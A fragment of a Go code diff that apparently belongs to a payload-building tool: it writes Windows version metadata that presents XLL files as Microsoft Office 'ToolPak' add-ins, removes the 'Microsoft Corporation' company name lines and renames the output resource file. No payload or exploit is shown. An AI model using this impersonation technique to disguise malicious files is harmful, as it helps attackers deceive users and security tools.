"16.0.10001.10000" @@ -1070,7 +1059,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Zoom.xll" } if name == "Updates" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Updates.xll " vi.StringFileInfo.FileDescription = "Microsoft Update ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1089,7 +1077,6 @@ func FileProperties(name string, configFile string) string { } if name == "Calendar" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Calendar.xll " vi.StringFileInfo.FileDescription = "Calendar ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1107,7 +1094,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Calendar.xll" } if name == "Memo" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Memo.xll " vi.StringFileInfo.FileDescription = "Memo ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1125,7 +1111,6 @@ func FileProperties(name string, configFile string) string { vi.StringFileInfo.InternalName = "Memo.xll" } if name == "Desk" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Desk.xll " vi.StringFileInfo.FileDescription = "Office Desktop ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1144,7 +1129,6 @@ func FileProperties(name string, configFile string) string { } if name == "Appwiz" { - vi.StringFileInfo.CompanyName = "Microsoft Corporation" vi.StringFileInfo.InternalName = "Appwiz.xll " vi.StringFileInfo.FileDescription = "Application Installer ToolPak" vi.StringFileInfo.FileVersion = "16.0.10001.10000" @@ -1163,15 +1147,13 @@ func FileProperties(name string, configFile string) string { } } - vi.StringFileInfo.CompanyName = "Microsoft Corporation" - vi.Build() vi.Walk() var archs []string archs = []string{"amd64"} for _, item := range archs { - fileout := "resource_windows.syso" + fileout := "fart.syso" if err := vi.WriteSyso(fileout, item); err != nil { log.Printf("Error writing syso: %v", err) os.Exit(3)